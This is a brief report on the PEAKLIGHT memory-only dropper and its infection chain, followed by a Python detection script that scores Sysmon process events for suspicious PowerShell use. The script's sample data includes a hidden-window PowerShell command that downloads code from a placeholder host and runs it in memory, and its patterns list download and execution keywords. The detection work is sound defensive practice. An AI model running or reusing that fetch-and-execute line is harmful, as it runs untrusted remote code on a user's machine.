Peaklight Malware Targets Users to Steal Credentials, Browser History, and Financial Data
PEAKLIGHT, a sophisticated memory-only dropper and downloader, has emerged as a significant threat in the cybersecurity landscape. This malware, distributed through malicious ZIP files disguised as pirated movies, initiates a multi-stage infection process using Microsoft Shortcut Files (LNK) and PowerShell scripts. PEAKLIGHT's primary function is to deliver various infostealers, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT, while employing advanced evasion techniques such as system binary proxy execution and CDN abuse. The malware's complex obfuscation methods and lack of disk footprint make it challenging to detect. Cybersecurity firms like Mandiant, Morphisec, and TRAC Labs have analyzed PEAKLIGHT's tactics and provided recommendations for protection, including monitoring for suspicious activities and implementing advanced security tools like Sysmon and Wazuh. As the threat landscape continues to evolve, the emergence of PEAKLIGHT underscores the importance of robust cybersecurity measures and ongoing vigilance.
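The monitoring recommendation above can be expressed as a triage rule over Sysmon process-creation records (Event ID 1); this is an added example, not code from the article or from the vendors it names. The patterns, the threshold, the choice of `mshta.exe` as a proxy binary, and the sample events are all assumptions constructed for illustration, not published PEAKLIGHT indicators.

```python
import re

# Heuristics chosen for this example (assumptions, not published PEAKLIGHT indicators).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}  # mshta: assumed proxy binary
LNK_PARENTS = {"explorer.exe"}  # a double-clicked shortcut starts its target under Explorer
HINTS = [
    (re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), "hidden window"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"\b(downloadstring|downloaddata|invoke-webrequest|iwr)\b", re.I), "network download"),
    (re.compile(r"https?://", re.I), "remote URL on command line"),
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the reasons a Sysmon Event ID 1 record matches the LNK-to-script-host pattern."""
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    cmd = event.get("CommandLine", "")
    reasons = [label for rx, label in HINTS if rx.search(cmd)]
    if basename(event.get("ParentImage", "")) in LNK_PARENTS:
        reasons.append("script host launched from Explorer")
    return reasons

def triage(events, threshold=3):
    """Keep only events with at least `threshold` reasons, to limit false positives."""
    return [(e["CommandLine"], r) for e in events if len(r := score_event(e)) >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample records using Sysmon's Image / CommandLine / ParentImage fields.
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": EXPLORER, "CommandLine":
     "powershell.exe -WindowStyle Hidden -Command iex (New-Object Net.WebClient)"
     ".DownloadString('https://cdn.example.invalid/a')"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Temp"},
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": EXPLORER,
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS):
        print(cmdline, "->", ", ".join(reasons))
```

Because the dropper runs in memory, command-line and parent-process telemetry of this kind is where the chain remains visible; the same logic translates to a Wazuh rule keyed on the Sysmon fields used here.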